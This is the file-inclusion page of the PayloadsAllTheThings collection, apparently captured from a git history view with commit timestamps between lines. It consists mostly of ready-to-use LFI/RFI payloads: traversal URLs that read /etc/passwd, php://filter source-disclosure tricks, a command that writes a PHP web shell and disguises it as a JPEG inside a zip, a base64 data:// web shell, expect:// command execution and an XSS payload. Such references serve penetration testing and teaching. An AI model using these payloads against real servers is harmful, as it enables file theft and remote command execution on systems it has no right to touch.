PayloadsAllTheThings/PHP include/README.md

55 lines
1.8 KiB
Markdown
Raw Normal View History

2016-10-20 02:39:06 +00:00
# Local/Remote File Inclusion
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
## Exploit
Basic LFI (null byte, double encoding and other tricks)
2016-10-20 02:39:06 +00:00
```
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
2016-10-20 02:39:06 +00:00
```
2017-07-02 21:10:34 +00:00
LFI Wrapper rot13 and base64 - php://filter case insensitive
2016-10-20 02:39:06 +00:00
```
2016-10-24 17:15:10 +00:00
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
2017-07-02 21:10:34 +00:00
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
can be chained with a compression wrapper
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
2016-10-20 02:39:06 +00:00
```
2017-07-02 21:10:34 +00:00
LFI Wrapper ZIP
2016-10-20 02:39:06 +00:00
```python
os.system("echo \"</pre><?php system($_GET['cmd']); ?></pre>\" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php")
2017-07-02 21:10:34 +00:00
2016-10-24 17:15:10 +00:00
http://example.com/index.php?page=zip://shell.jpg%23payload.php
2016-10-20 02:39:06 +00:00
```
2017-07-02 21:10:34 +00:00
RFI Wrapper DATA with "<?php system($_GET['cmd']);echo 'Shell done !'; ?>" payload
2016-10-20 02:39:06 +00:00
```
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
```
2017-07-02 21:10:34 +00:00
RFI Wrapper EXPECT
```
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
```
2016-10-20 02:39:06 +00:00
2016-10-24 17:18:07 +00:00
XSS via RFI/LFI with "<<svg<>svg onload=alert(1)>" payload
<svg onload=alert(1)>
2016-10-20 02:39:06 +00:00
```
2016-10-24 17:15:10 +00:00
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
2016-10-20 02:39:06 +00:00
```
## Thanks to
2017-07-02 21:10:34 +00:00
* https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion